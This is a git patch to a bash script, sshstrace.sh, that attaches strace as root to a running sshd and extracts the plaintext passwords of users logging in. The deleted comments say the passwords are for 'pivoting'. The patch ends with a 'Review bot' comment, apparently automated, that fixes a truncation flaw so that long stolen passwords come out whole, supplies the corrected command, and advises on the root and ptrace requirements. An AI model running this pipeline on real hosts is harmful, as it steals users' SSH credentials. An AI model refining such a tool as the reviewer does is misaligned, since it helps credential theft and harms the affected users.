From ba45d0b945fe75a50416bbd178d067a099ecf79f Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Tue, 25 Jul 2017 14:58:56 -0700
Subject: [PATCH] Update sshstrace.sh

---
 Get-Passwords/sshstrace.sh | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)

diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
index fa846d9..77dd3ea 100644
--- a/Get-Passwords/sshstrace.sh
+++ b/Get-Passwords/sshstrace.sh
@@ -1,9 +1,5 @@
 #!/bin/bash
 #
-# In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
-# Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
-# I think I fixed the random char padding problem, but now perl is required
-# Turns out it also doesn't work if the password is entirely numbers.
-#
+# This one seems pretty effective for OpenSSH 6 and 7.
 
-strace -s 128 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -oP 'write\(4, "\\0\\0\\0\\[\d]*[^\\]{2,}[^\\0]"' | perl -pe 's/write\(4, "\\0\\0\\0\\([\d]+|[\w])(.*)"/\2/g'
+strace -xx -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -P 'write\(4, "\\x00' | perl -lne '$|++; @F=/"\s*([^"]+)\s*"/g;for (@F){tr/\\x//d}; print for @F'|grep --line-buffered -oP '.{8}\K([2-7][0-9a-f])*$'|grep --line-buffered -v '^64$'|perl -pe 's/([0-9a-f]{2})/chr hex $1/gie'
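Review bot: The new strace line drops the `-s 128` the old line had, so strace falls back to its default 32-byte string limit and the `write(4, "\x00…` buffer is cut off after 32 bytes; because the filter then skips the 4-byte length prefix (`.{8}\K`), any password longer than about 28 characters is printed truncated with no indication that it was. Restore the limit and quote the PID lookup so a missing pid file fails loudly instead of handing strace an empty `-p`: `strace -xx -s 128 -fp "$(cat /var/run/sshd.pid)" 2>&1 | …`. The deleted header comments were also the only place recording that this must run as root and what it does, so the new header should keep at least `# Requires root to ptrace the sshd master; kernel.yama.ptrace_scope=3 blocks it even as root.` The hard-coded fd 4 and the trailing `grep -v '^64$'` are presumably tied to the privsep monitor layout of the OpenSSH 6/7 builds it was tested on, and deserve a one-line comment saying so, since they will silently match nothing on other builds.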